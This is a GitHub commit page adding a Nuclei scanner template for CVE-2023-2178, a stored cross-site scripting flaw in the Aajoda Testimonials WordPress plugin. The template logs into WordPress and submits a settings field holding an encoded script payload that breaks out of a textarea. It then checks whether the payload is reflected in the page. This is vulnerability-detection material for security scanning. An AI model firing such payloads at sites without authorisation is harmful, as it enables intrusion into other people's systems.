Skip to content

Commit

Permalink
Merge pull request #7760 from projectdiscovery/CVE-2023-2178
Browse files Browse the repository at this point in the history
Create CVE-2023-2178.yaml
  • Loading branch information
DhiyaneshGeek committed Jul 25, 2023
2 parents 00c2ba0 + cd4831d commit 2e733a5
Showing 1 changed file with 44 additions and 0 deletions.
44 changes: 44 additions & 0 deletions http/cves/2023/CVE-2023-2178.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,44 @@
id: CVE-2023-2178

info:
name: Aajoda Testimonials < 2.2.2 - Cross-Site Scripting
author: Farish
severity: medium
description: |
The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
reference:
- https://wpscan.com/vulnerability/e84b71f9-4208-4efb-90e8-1c778e7d2ebb
- https://downloads.wordpress.org/plugin/aajoda-testimonials.2.1.0.zip
- https://nvd.nist.gov/vuln/detail/CVE-2023-2178
classification:
cve-id: CVE-2023-2178
metadata:
max-request: 1
verified: true
tags: cve,cve2023,wordpress,wp,wp-plugin,xss,authenticated

http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
aajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(all_headers_2, "text/html")'
- 'contains(body_2, "></textarea><script>alert(document.domain)</script>")'
- 'contains(body_2, "page_aajoda-testimonials")'
condition: and

0 comments on commit 2e733a5

Please sign in to comment.